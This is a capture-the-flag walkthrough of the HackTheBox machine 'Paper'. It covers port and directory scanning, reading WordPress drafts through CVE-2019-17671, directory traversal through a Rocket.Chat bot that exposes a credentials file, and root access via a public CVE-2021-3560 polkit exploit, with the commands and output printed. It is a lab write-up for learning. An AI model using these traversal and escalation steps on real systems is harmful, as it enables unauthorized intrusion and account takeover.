Paper
Paper is a easy HTB lab that focuses on directory traversal, sensitive information disclosure and privilege escalation. In this walkthrough, we will go over the process of exploiting the services and gaining access to the root user.
Recon
The first step in any penetration testing process is reconnaissance. We can start by running nmap scan on the target machine to identify open ports and services.
$ sudo nmap -p- -sV -sC 10.129.38.169
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-14 04:08 GMT
Nmap scan report for 10.129.38.169
Host is up (0.024s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 1005ea5056a600cb1c9c93df5f83e064 (RSA)
| 256 588c821cc6632a83875c2f2b4f4dc379 (ECDSA)
|_ 256 3178afd13bc42e9d604eeb5d03eca022 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.20 seconds
Enumerating the files and directories in the website:
$ feroxbuster -u https://10.129.38.169/ -A -k -d 4 --filter-status 404 --smart --output web.txt -w /usr/share/wordlists/dirb/common.txt
$ feroxbuster -u https://10.129.38.169/ -A -k -d 4 --filter-status 404 --smart --output web2.txt -w /usr/share/wordlists/dirb/big.txt --dont-scan https://10.129.38.169/manual/ --dont-scan https://10.129.38.169/icons/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher π€ ver: 2.9.3
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ
π― Target Url β https://10.129.38.169/
π« Don't Scan Url β https://10.129.38.169/manual
π« Don't Scan Url β https://10.129.38.169/icons
π Threads β 50
π Wordlist β /usr/share/wordlists/dirb/big.txt
π’ Status Code Filters β [404]
π₯ Timeout (secs) β 7
𦑠User-Agent β Random
π Config File β /etc/feroxbuster/ferox-config.toml
π Extract Links β true
πΎ Output File β web2.txt
π¦ Collect Backups β true
π€ Collect Words β true
π HTTP methods β [GET]
π Insecure β true
πΆ Auto Tune β true
π Recursion Depth β 4
π New Version Available β https://github.com/epi052/feroxbuster/releases/latest
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ
π Press [ENTER] to use the Scan Management Menuβ’
ββββββββββββββββββββββββββββββββββββββββββββββββββ
404 GET 7l 23w 196c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 20w 199c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 27l 138w 10208c https://10.129.38.169/poweredby.png
403 GET 70l 2438w 199691c https://10.129.38.169/
[####################] - 8s 40950/40950 0s found:2 errors:0
[####################] - 6s 20469/20469 3108/s https://10.129.38.169/
[####################] - 6s 20469/20469 3184/s https://10.129.38.169/cgi-bin/
Getting some header information if we can access http
port:
$ curl -I http://10.129.38.169/ -k
HTTP/1.1 403 Forbidden
Date: Sun, 14 Jan 2024 06:09:35 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
Adding new domains found to /etc/hosts
from the X-Backend-Server
header in response.
sudo tee --append /etc/hosts <<< "10.129.38.169 office.paper"
Enumerating the new website:
$ feroxbuster -u http://office.paper/ -A -k -d 4 --filter-status 404 --smart --output web_paper.txt -w /usr/share/wordlists/dirb/common.txt --dont-scan http://office.paper/manual/
http://office.paper/wp-login.php?redirect_to=http%3A%2F%2Foffice.paper%2Fwp-admin%2Fadmin.php&reauth=1
[####################] - 1s 4619/4614 2615/s http://office.paper/
[####################] - 1s 4683/4683 2349/s http://office.paper/cgi-bin/
[###>----------------] - 2m 803/4614 6/s http://office.paper/index.php/comments/feed/
[####################] - 21s 4683/4683 252/s http://office.paper/wp-admin/
[####################] - 20s 4683/4683 261/s http://office.paper/wp-content/
[####################] - 21s 4683/4683 246/s http://office.paper/wp-includes/
4: Pages similar to: http://office.paper/c3c9cc8a1288425987463daf8a29d323
5: Pages similar to: http://office.paper/.htaccessd04b93346d4f4fe1a00d8c72ed1252d6
6: GET requests with 404 responses containing 18985 bytes, 882 words, and 199 lines
7: Pages similar to: http://office.paper/index.php/comments/feed/4f4e57c94487424b8c211c4777ca1b11
Attack
Opening the website http://office.paper/
, gives us the following information:
- Only author - http://office.paper/index.php/author/prisonmike/
- There is some secret information in drafts.
Feeling Alone!
I am sorry everyone. I wanted to add every one of my friends to this blog, but Jan didnβt let me.
So, other employees who were added to this blog are now removed.
As of now there is only one user in this blog. Which is me! Just me.
Previous Article
One thought on βFeeling Alone!β
nick
June 20, 2021 at 2:49 pm
Michael, you should remove the secret content from your drafts ASAP, as they are not that secure as you think!
Searching online for drafts exploit (CVE-2019-17671) - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2/
Based on that we got the following information from http://office.paper/?static=1
.
test
Micheal please remove the secret from drafts for gods sake!
Hello employees of Blunder Tiffin,
Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
So, I kindly request you all to take your discussions from the public blog to a more private chat system.
-Nick
# Warning for Michael
Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick
Threat Level Midnight
A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT
[INT:DAY]
Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigtβ¦.
# Secret Registration URL of new Employee chat system
http://chat.office.paper/register/8qozr226AhkCHZdyY
# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
# Also, stop looking at my drafts. Jeez!
User
Using this, we added new subdomain to /etc/hosts
. After login, we can see the general
group chat. We got following information:
- Bot - Just call the bot by his name and say help. His name is recyclops. For eg: sending "recyclops help" will spawn the bot and he'll tell you what you can and cannot ask him.
- Group is read only but direct message to
recyclops
is possible.
Executing following commands to enumerate the machine:
recyclops time
recyclops list /
recyclops file /sale/portfolio.txt
recyclops list /../
# dwight user
recyclops file /../.hubot_history
recyclops list /../hubot/
recyclops file /../hubot/.env
<!=====Contents of file /../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queen***********
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
Getting the user flag:
$ ssh dwight@office.paper
dwight@office.paper's password: Queen***********
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ cat user.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~
Privilege Escalation
Getting the sudo
version.
$ sudo -V
Sudo version 1.8.29
Sudoers policy plugin version 1.8.29
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.29
Using linpeas.sh
, we can find that machine is vulnerable to CVE-2021-3560
and for that we can use this POC -https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation/blob/main/poc.sh.
$ sh poc.sh -u='sec' -p=sec
[!] Username set as : sec
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username sec...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username sec with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - sec
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
Gaining the root shell with the new credentials:
[dwight@paper ~]$ su - sec
Password:
[sec@paper ~]$ sudo bash
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for sec:
[root@paper sec]# id
uid=0(root) gid=0(root) groups=0(root)
Getting the flag:
[root@paper sec]# cat /root/root.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~